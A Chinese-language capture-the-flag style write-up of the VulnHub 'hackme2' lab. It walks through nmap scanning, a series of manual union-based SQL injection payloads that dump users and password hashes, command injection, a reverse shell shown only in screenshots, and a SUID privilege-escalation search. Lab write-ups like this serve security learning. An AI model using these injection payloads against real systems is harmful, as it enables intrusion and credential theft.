一、前言

通過大量vulnhub受控靶機積累一線攻防經(jīng)驗和技巧。

二、環(huán)境

靶機名稱：hackeme2

靶機難度：中級

目標(biāo)：獲取root權(quán)限

攻擊機：kali linux，IP地址192.168.229.129

靶機：hackeme2，IP地址192.168.229.128

三、挑戰(zhàn)過程

1.IP探測和端口探測

nmap -sP 192.168.229.1/24

nmap -T4 -A -sS -p 1-65535 -v 192.168.229.128

圖一

2.探索web服務(wù)

圖二

圖三

圖四

注冊aaa賬號，密碼abc123登錄后的web服務(wù)情況

圖五

對這些web服務(wù)可以有的嘗試，目錄爆破，xss，sql注入，命令注入。在welcome.php界面的search參數(shù)post請求我們發(fā)現(xiàn)有sql注入漏洞。

什么輸入都沒有

Linux

Linux%' and database() like'

Linux%'/**/and/**/database()/**/like'

Linux%'/**/union/**/select/**/database(),2,3/**/like'

Linux%'/**/union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'webapp

Linux%'/**/union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_name='users'and/**/table_schema/**/like'webapp

Linux%'/**/union/**/select/**/group_concat(user),group_concat(pasword),3/**/from/**/users/**/where/**/'1'/**/like/**/'

解密得到:superadmin/Uncrackable

圖六

圖七

該處有個詭異點，明明有sql注入，手注可以發(fā)現(xiàn)，我的kali的sqlmap跑不出來，別人能跑出來?。?！我很震驚。問了常做滲透的朋友說這種現(xiàn)象正常，和版本，IP，人品有關(guān)（一臉懵逼加無語），不過是小概率事件，他做了這么久，只出現(xiàn)兩次，一次他沒跑出來別人跑出來了，一次別人沒跑出來他跑出來了。

圖八

圖九

圖十

圖十一

這里有個上傳功能點可以傳jpg等，另外last name功能點fuzz發(fā)現(xiàn)可以命令執(zhí)行。

圖十二

圖十三

圖十四

準(zhǔn)備反彈shell，上傳并執(zhí)行

圖十五

圖十六

圖十七

圖十八

4.提權(quán)

find / -perm -4000 2> /dev/null

查找系統(tǒng)所有文件中擁有suid特殊權(quán)限的文件

-perm匹配權(quán)限

4000 2000 1000分別表示SUID SGID SBIT

a.普通文件，文件的權(quán)限一般三位，777最高文件權(quán)限

-perm -0777搜索的就是最高權(quán)限的文件rwxrwxrwx

-perm +0777搜索的只要包含rwxrwxrwx任意一個的文件

b.特殊文件，包含權(quán)限位置四位，7000為最高，即–s–s–t，同樣的方法

-perm -7000搜索的就是最高權(quán)限的文件–s–s–t

-perm +7000搜索的只要包含–s–s–t任意一個的文件，–s––（4000）、––s–（2000）、–––t（1000）等

圖十九

四、總結(jié)

風(fēng)險點：

1.存在sql注入，且數(shù)據(jù)庫的密碼表加密算法過于簡單

2.存在命令注入

3.濫用了suid致使輕易提權(quán)

五、疑問點

1.【high】sql注入手注能力不是很強，需要sqli-lab專項練習(xí)

2.【high】別人sqlmap跑的出，我跑不出

3.【high】命令注入的fuzz需要在專項提升一下，了解更多場景的應(yīng)用

4.【high】希望能基于g0tmi1k的Basic?Linux?Privilege?Escalation形成更系統(tǒng)的提權(quán)審視，以前詳讀過，不過做了一些vulnhub后發(fā)現(xiàn)我當(dāng)時看的太淺了，這算是一種專項審查，需要培養(yǎng)這種系統(tǒng)性思維和案例實踐積累。

參考鏈接

1.【思路】https://blog.csdn.net/weixin_45922278/article/details/114003257

2.【思路】https://my.oschina.net/u/4641386/blog/4674046

3.【提權(quán)】https://www.leavesongs.com/PENETRATION/linux-suid-privilege-escalation.html